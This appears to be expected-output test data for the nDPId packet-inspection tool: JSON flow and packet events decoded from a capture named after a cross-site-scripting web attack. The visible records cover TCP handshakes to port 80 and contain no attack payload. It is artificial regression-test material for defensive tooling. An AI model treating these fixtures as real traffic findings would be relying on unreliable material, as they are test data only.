-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":3,"flow_last_seen":1499347899276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347899276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zuJAAD4G9vWsEAABwKgKMoRGAFBlPbtS2bXNnoAQAOXwegAAAQEICgE8dbAD5kck"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347900544,"flow_last_seen":1499347900544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347900544,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1499347900544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347900544,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8T6pAAD4GdiasEAABwKgKMoRUAFAKnjlHAAAAAKACchAeUQAAAgQFtAQCCAoBPHbtAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":2,"flow_last_seen":1499347900544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347900544,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhFRwu76qCp45SKAScSCjggAAAgQFtAQCCAoD5khhATx27QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":3,"flow_last_seen":1499347900544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347900544,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0T6tAAD4Gdi2sEAABwKgKMoRUAFAKnjlIcLu+q4AQAOVCigAAAQEICgE8du0D5khh"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7773,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347903125,"flow_last_seen":1499347903125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347903125,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7773,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1499347903125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347903125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Iy1AAD4GoqOsEAABwKgKMoRuAFDn\/lpfAAAAAKACchAdOQAAAgQFtAQCCAoBPHlyAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":2,"flow_last_seen":1499347903125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347903125,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhG41OTml5\/5aYKAScSBgbQAAAgQFtAQCCAoD5krmATx5cgEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7775,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":3,"flow_last_seen":1499347903125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347903125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Iy5AAD4GoqqsEAABwKgKMoRuAFDn\/lpgNTk5poAQAOX\/dAAAAQEICgE8eXID5krm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347904387,"flow_last_seen":1499347904387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347904387,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1499347904387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347904387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wAJAAD4GBc6sEAABwKgKMoR8AFDhZ7qvAAAAAKACchDCNgAAAgQFtAQCCAoBPHqtAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7783,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":2,"flow_last_seen":1499347904387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347904387,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhHxZjS4N4We6sKAScSDrcgAAAgQFtAQCCAoD5kwiATx6rQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":3,"flow_last_seen":1499347904387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347904387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wANAAD4GBdWsEAABwKgKMoR8AFDhZ7qwWY0uDoAQAOWKeQAAAQEICgE8eq4D5kwi"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7794,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347905694,"flow_last_seen":1499347905694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7794,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1499347905694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347905694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dZJAAD4GUD6sEAABwKgKMoSKAFAcIA5mAAAAAKACchAycwAAAgQFtAQCCAoBPHv0AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7795,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":2,"flow_last_seen":1499347905694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347905694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhIr8f9XqHCAOZ6AScSAPmAAAAgQFtAQCCAoD5k1pATx79AEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7796,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":3,"flow_last_seen":1499347905695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347905695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dZNAAD4GUEWsEAABwKgKMoSKAFAcIA5n\/H\/V64AQAOWunwAAAQEICgE8e\/QD5k1p"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347908253,"flow_last_seen":1499347908253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347908253,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1499347908253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347908253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XLdAAD4GaRmsEAABwKgKMoSkAFDBACLDAAAAAKACchB2mwAAAgQFtAQCCAoBPH50AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":2,"flow_last_seen":1499347908253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347908253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhKRv9+kSwQAixKAScSDKoQAAAgQFtAQCCAoD5k\/oATx+dAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":3,"flow_last_seen":1499347908254,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347908254,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XLhAAD4GaSCsEAABwKgKMoSkAFDBACLEb\/fpE4AQAOVpqQAAAQEICgE8fnQD5k\/o"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347909575,"flow_last_seen":1499347909575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347909575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1499347909575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347909575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/H5AAD4GyVGsEAABwKgKMoSyAFC+M4PAAAAAAKACchAXEwAAAgQFtAQCCAoBPH++AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":2,"flow_last_seen":1499347909575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347909575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhLJ\/QSQIvjODwaAScSAfjwAAAgQFtAQCCAoD5lEzATx\/vgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":3,"flow_last_seen":1499347909576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347909576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/H9AAD4GyVisEAABwKgKMoSyAFC+M4PBf0EkCYAQAOW+lQAAAQEICgE8f78D5lEz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347912141,"flow_last_seen":1499347912141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347912141,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1499347912141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347912141,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AShAAD4GxKisEAABwKgKMoTMAFAccoNoAAAAAKACchC2kAAAAgQFtAQCCAoBPIJAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7846,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":2,"flow_last_seen":1499347912141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347912141,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhMwGDz+bHHKDaaAScSAaKwAAAgQFtAQCCAoD5lO0ATyCQAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7847,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":3,"flow_last_seen":1499347912142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347912142,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ASlAAD4GxK+sEAABwKgKMoTMAFAccoNpBg8\/nIAQAOW5MgAAAQEICgE8gkAD5lO0"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347913416,"flow_last_seen":1499347913416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347913416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1499347913416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347913416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80\/hAAD4G8desEAABwKgKMoTaAFDALVCHAAAAAKACchBEaQAAAgQFtAQCCAoBPIN\/AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":2,"flow_last_seen":1499347913416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347913416,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhNreW6gWwC1QiKAScSBl\/AAAAgQFtAQCCAoD5lTzATyDfwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":3,"flow_last_seen":1499347913417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347913417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00\/lAAD4G8d6sEAABwKgKMoTaAFDALVCI3luoF4AQAOUFBAAAAQEICgE8g38D5lTz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7868,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347914710,"flow_last_seen":1499347914710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347914710,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7868,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1499347914710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347914710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oQ5AAD4GJMKsEAABwKgKMoToAFDafCXMAAAAAKACchBThAAAAgQFtAQCCAoBPITCAAAAAAEDAwc="} 